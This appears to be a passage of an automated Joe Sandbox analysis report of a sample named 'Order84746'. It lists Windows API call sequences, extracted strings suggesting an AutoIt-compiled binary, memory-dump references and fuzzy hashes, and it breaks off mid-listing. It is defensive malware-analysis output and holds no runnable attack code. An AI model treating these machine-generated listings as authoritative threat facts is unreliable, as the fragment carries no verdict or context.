                          • LoadCursorW.USER32(00000000,00007F84), ref: 00937A4A
                          • LoadCursorW.USER32(00000000,00007F04), ref: 00937A55
                          • LoadCursorW.USER32(00000000,00007F02), ref: 00937A60
                          • LoadCursorW.USER32(00000000,00007F89), ref: 00937A6B
                          • GetCursorInfo.USER32(?), ref: 00937A7B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Cursor$Load$Info
                          • String ID:
                          • API String ID: 2577412497-0
                          • Opcode ID: d939d244fea7fb9e7002cd7490e23b68359bf52f1a92e44f5976dce5a36bb911
                          • Instruction ID: 58e8eb559c20553bbbdf4a88c2109c8a94c5246af88b5270ea81059427b4c51d
                          • Opcode Fuzzy Hash: d939d244fea7fb9e7002cd7490e23b68359bf52f1a92e44f5976dce5a36bb911
                          • Instruction Fuzzy Hash: 6131D4B1D4831E6ADB609FB68C8995FFEECFF04754F50452AE50DE7280DA78A5008FA1
                          APIs
                            • Part of subcall function 008FE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008EC8B7,?,00002000,?,?,00000000,?,008E419E,?,?,?,0097DC00), ref: 008FE984
                            • Part of subcall function 008E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E53B1,?,?,008E61FF,?,00000000,00000001,00000000), ref: 008E662F
                          • __wsplitpath.LIBCMT ref: 008EC93E
                            • Part of subcall function 00901DFC: __wsplitpath_helper.LIBCMT ref: 00901E3C
                          • _wcscpy.LIBCMT ref: 008EC953
                          • _wcscat.LIBCMT ref: 008EC968
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 008EC978
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 008ECABE
                            • Part of subcall function 008EB337: _wcscpy.LIBCMT ref: 008EB36F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                          • API String ID: 2258743419-1018226102
                          • Opcode ID: ad2139766afc07b2a85c0050440cab2ac5a702130d1b4ad0c37e0deb034df4b7
                          • Instruction ID: f07f70802d95d8505d37ccdae68a2524a7725681ce602619a7a9a1ee40c7a8bf
                          • Opcode Fuzzy Hash: ad2139766afc07b2a85c0050440cab2ac5a702130d1b4ad0c37e0deb034df4b7
                          • Instruction Fuzzy Hash: 9A127A715083819FC724EF29C841AAEBBE4FFD9354F40492DF989932A1DB309A49CB53
                          APIs
                          • _memset.LIBCMT ref: 0094CEFB
                          • DestroyWindow.USER32(?,?), ref: 0094CF73
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0094CFF4
                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0094D016
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0094D025
                          • DestroyWindow.USER32(?), ref: 0094D042
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008E0000,00000000), ref: 0094D075
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0094D094
                          • GetDesktopWindow.USER32 ref: 0094D0A9
                          • GetWindowRect.USER32(00000000), ref: 0094D0B0
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0094D0C2
                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0094D0DA
                            • Part of subcall function 008FB526: GetWindowLongW.USER32(?,000000EB), ref: 008FB537
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                          • String ID: 0$tooltips_class32
                          • API String ID: 3877571568-3619404913
                          • Opcode ID: 450072770c7ba953c4a4eaa46e8800cb2ca90434b8c99a735286ae2d3df51db7
                          • Instruction ID: 2822b30f8522540a8105a1667a412540cc4c3887fea815598571e3b6e37152a7
                          • Opcode Fuzzy Hash: 450072770c7ba953c4a4eaa46e8800cb2ca90434b8c99a735286ae2d3df51db7
                          • Instruction Fuzzy Hash: C071EEB4655305AFDB20CF28CC84F6A37E9FB89704F08451DF985872A1D774E842DB62
                          APIs
                          • VariantInit.OLEAUT32(00000000), ref: 0092AB3D
                          • VariantCopy.OLEAUT32(?,?), ref: 0092AB46
                          • VariantClear.OLEAUT32(?), ref: 0092AB52
                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0092AC40
                          • __swprintf.LIBCMT ref: 0092AC70
                          • VarR8FromDec.OLEAUT32(?,?), ref: 0092AC9C
                          • VariantInit.OLEAUT32(?), ref: 0092AD4D
                          • SysFreeString.OLEAUT32(00000016), ref: 0092ADDF
                          • VariantClear.OLEAUT32(?), ref: 0092AE35
                          • VariantClear.OLEAUT32(?), ref: 0092AE44
                          • VariantInit.OLEAUT32(00000000), ref: 0092AE80
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                          • API String ID: 3730832054-3931177956
                          • Opcode ID: 123e9de2ddd2911c2013ff0834087d11261afef0bcb1f72eee099d6bdd5c2dd9
                          • Instruction ID: 1281b29810b4630333027111c5b61f5a29495d5aa5f28c4f5f231c9119d8776c
                          • Opcode Fuzzy Hash: 123e9de2ddd2911c2013ff0834087d11261afef0bcb1f72eee099d6bdd5c2dd9
                          • Instruction Fuzzy Hash: 24D1F372A04225DFDB109F69E884B79B7B9FF04B00F148895E415DB199DB78EC40DBA3
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 009471FC
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00947247
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BuffCharMessageSendUpper
                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                          • API String ID: 3974292440-4258414348
                          • Opcode ID: 1411d00b3466548ebf8b301c6c9eacc7e400a99b82ed1f0fb0279369ccb3c60a
                          • Instruction ID: dd4e76c1c857139cc027ff9a444199cb2479e9b34020b4a25591c86aed2e8af0
                          • Opcode Fuzzy Hash: 1411d00b3466548ebf8b301c6c9eacc7e400a99b82ed1f0fb0279369ccb3c60a
                          • Instruction Fuzzy Hash: 55917D702087459BCB14EF68C851A6EF7A5FF85310F004858F9969B3A3DB74ED4ACB92
                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0094E5AB
                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00949808,?), ref: 0094E607
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0094E647
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0094E68C
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0094E6C3
                          • FreeLibrary.KERNEL32(?,00000004,?,?,?,00949808,?), ref: 0094E6CF
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0094E6DF
                          • DestroyCursor.USER32(?), ref: 0094E6EE
                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0094E70B
                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0094E717
                            • Part of subcall function 00900FA7: __wcsicmp_l.LIBCMT ref: 00901030
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                          • String ID: .dll$.exe$.icl
                          • API String ID: 3907162815-1154884017
                          • Opcode ID: cca6da1d3fcf131b281e5bc2dccdb9ac7c495b74cc003558b408b553913f5959
                          • Instruction ID: 021fd7e900d3830c62ae93952fdfe5d7bede1393b1a27864aa1e0abd6647ea36
                          • Opcode Fuzzy Hash: cca6da1d3fcf131b281e5bc2dccdb9ac7c495b74cc003558b408b553913f5959
                          • Instruction Fuzzy Hash: 0A61B071A10215BEEB24DF68CC46FBE7BACBB18724F104505F925D61D1EBB4A980DBA0
                          APIs
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          • CharLowerBuffW.USER32(?,?), ref: 0092D292
                          • GetDriveTypeW.KERNEL32 ref: 0092D2DF
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0092D327
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0092D35E
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0092D38C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                          • API String ID: 1148790751-4113822522
                          • Opcode ID: cb021a2769aa8e5875893cd9b4d48983284ed35f3596e2a1ac9a9f364707b85c
                          • Instruction ID: bc32713e962321caf1e3d3ffaa312e7b2db0263e815f011e501ec76ba90e036d
                          • Opcode Fuzzy Hash: cb021a2769aa8e5875893cd9b4d48983284ed35f3596e2a1ac9a9f364707b85c
                          • Instruction Fuzzy Hash: A8515E715043459FC700EF29D88196EB7E8FF99758F00886DF895A72A1DB31EE06CB92
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00953973,00000016,0000138C,00000016,?,00000016,0097DDB4,00000000,?), ref: 009226F1
                          • LoadStringW.USER32(00000000,?,00953973,00000016), ref: 009226FA
                          • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00953973,00000016,0000138C,00000016,?,00000016,0097DDB4,00000000,?,00000016), ref: 0092271C
                          • LoadStringW.USER32(00000000,?,00953973,00000016), ref: 0092271F
                          • __swprintf.LIBCMT ref: 0092276F
                          • __swprintf.LIBCMT ref: 00922780
                          • _wprintf.LIBCMT ref: 00922829
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00922840
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                          • API String ID: 618562835-2268648507
                          • Opcode ID: 7b2a7b7ebff5a86a7bb7c50d13b213703ebb74538c6eb4e8785b228ed6f2c9c9
                          • Instruction ID: b9e629cd53441edc33164294c2f5b17bbafb49322d6d3b1c564b011b1a9df754
                          • Opcode Fuzzy Hash: 7b2a7b7ebff5a86a7bb7c50d13b213703ebb74538c6eb4e8785b228ed6f2c9c9
                          • Instruction Fuzzy Hash: AD414E72800259BACB14FBE9DD86EEEB778FF56344F500065F501B2092EA70AF09DB61
                          APIs
                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0092D0D8
                          • __swprintf.LIBCMT ref: 0092D0FA
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0092D137
                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0092D15C
                          • _memset.LIBCMT ref: 0092D17B
                          • _wcsncpy.LIBCMT ref: 0092D1B7
                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0092D1EC
                          • CloseHandle.KERNEL32(00000000), ref: 0092D1F7
                          • RemoveDirectoryW.KERNEL32(?), ref: 0092D200
                          • CloseHandle.KERNEL32(00000000), ref: 0092D20A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                          • String ID: :$\$\??\%s
                          • API String ID: 2733774712-3457252023
                          • Opcode ID: 80300672269ca4ff26fce380a1cba2ce4441b0da9cdf35be77bd365b3e8eca6e
                          • Instruction ID: dda201301555eb298c9f8bdc89bb77540a5dc07e3494e1535e00bdc5f6a68d93
                          • Opcode Fuzzy Hash: 80300672269ca4ff26fce380a1cba2ce4441b0da9cdf35be77bd365b3e8eca6e
                          • Instruction Fuzzy Hash: C031C1B2A15119ABDB20DFA0DC48FEB37BCEF89740F1040BAF519D21A5E77096448B24
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                          • String ID:
                          • API String ID: 884005220-0
                          • Opcode ID: b92e18b4737de4d50774051b1bdfd5c05ddb7584a6bb9841603ebc895777c4ee
                          • Instruction ID: a3814a84eaa506322a499578c85ba036811166d4e67f46d33194fcfbdcc7f716
                          • Opcode Fuzzy Hash: b92e18b4737de4d50774051b1bdfd5c05ddb7584a6bb9841603ebc895777c4ee
                          • Instruction Fuzzy Hash: 44611472B08319AFEB206F64DC417FB37A8EF85364F600565E865AB1C0DF34D980A795
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0094E754
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0094E76B
                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0094E776
                          • CloseHandle.KERNEL32(00000000), ref: 0094E783
                          • GlobalLock.KERNEL32(00000000), ref: 0094E78C
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0094E79B
                          • GlobalUnlock.KERNEL32(00000000), ref: 0094E7A4
                          • CloseHandle.KERNEL32(00000000), ref: 0094E7AB
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0094E7BC
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0096D9BC,?), ref: 0094E7D5
                          • GlobalFree.KERNEL32(00000000), ref: 0094E7E5
                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 0094E809
                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0094E834
                          • DeleteObject.GDI32(00000000), ref: 0094E85C
                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0094E872
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                          • String ID:
                          • API String ID: 3840717409-0
                          • Opcode ID: ddde88fecdf982f806a9021db4855f1d0d7f818cd28ce971a2134384f9379b05
                          • Instruction ID: b5be81e4e4bcec9bb3055326db7cfb64301a8cc10f33cc6d8d417c33951acf6c
                          • Opcode Fuzzy Hash: ddde88fecdf982f806a9021db4855f1d0d7f818cd28ce971a2134384f9379b05
                          • Instruction Fuzzy Hash: 06414975A01204EFDB119F65CC88EAA7BB8FF89725F108058F926D7260D7B09D40EB60
                          APIs
                          • __wsplitpath.LIBCMT ref: 0093076F
                          • _wcscat.LIBCMT ref: 00930787
                          • _wcscat.LIBCMT ref: 00930799
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009307AE
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 009307C2
                          • GetFileAttributesW.KERNEL32(?), ref: 009307DA
                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 009307F4
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00930806
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                          • String ID: *.*
                          • API String ID: 34673085-438819550
                          • Opcode ID: df86110f38b441e5e34e132d6896b3acaa383637b53148145b39194e4e499e40
                          • Instruction ID: 6e7e85bafc4fd3c002db7c7c95dac8a6398fd74aff27fd3124a3ea69b9de2fdc
                          • Opcode Fuzzy Hash: df86110f38b441e5e34e132d6896b3acaa383637b53148145b39194e4e499e40
                          • Instruction Fuzzy Hash: DB817E715043459FCB24DF28C86696AB7E8FBC9308F148D2EF889D7251E634D954CF92
                          APIs
                            • Part of subcall function 0091ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0091ABD7
                            • Part of subcall function 0091ABBB: GetLastError.KERNEL32(?,0091A69F,?,?,?), ref: 0091ABE1
                            • Part of subcall function 0091ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0091A69F,?,?,?), ref: 0091ABF0
                            • Part of subcall function 0091ABBB: RtlAllocateHeap.NTDLL(00000000,?,0091A69F), ref: 0091ABF7
                            • Part of subcall function 0091ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0091AC0E
                            • Part of subcall function 0091AC56: GetProcessHeap.KERNEL32(00000008,0091A6B5,00000000,00000000,?,0091A6B5,?), ref: 0091AC62
                            • Part of subcall function 0091AC56: RtlAllocateHeap.NTDLL(00000000,?,0091A6B5), ref: 0091AC69
                            • Part of subcall function 0091AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0091A6B5,?), ref: 0091AC7A
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0091A8CB
                          • _memset.LIBCMT ref: 0091A8E0
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0091A8FF
                          • GetLengthSid.ADVAPI32(?), ref: 0091A910
                          • GetAce.ADVAPI32(?,00000000,?), ref: 0091A94D
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0091A969
                          • GetLengthSid.ADVAPI32(?), ref: 0091A986
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0091A995
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0091A99C
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0091A9BD
                          • CopySid.ADVAPI32(00000000), ref: 0091A9C4
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0091A9F5
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0091AA1B
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0091AA2F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
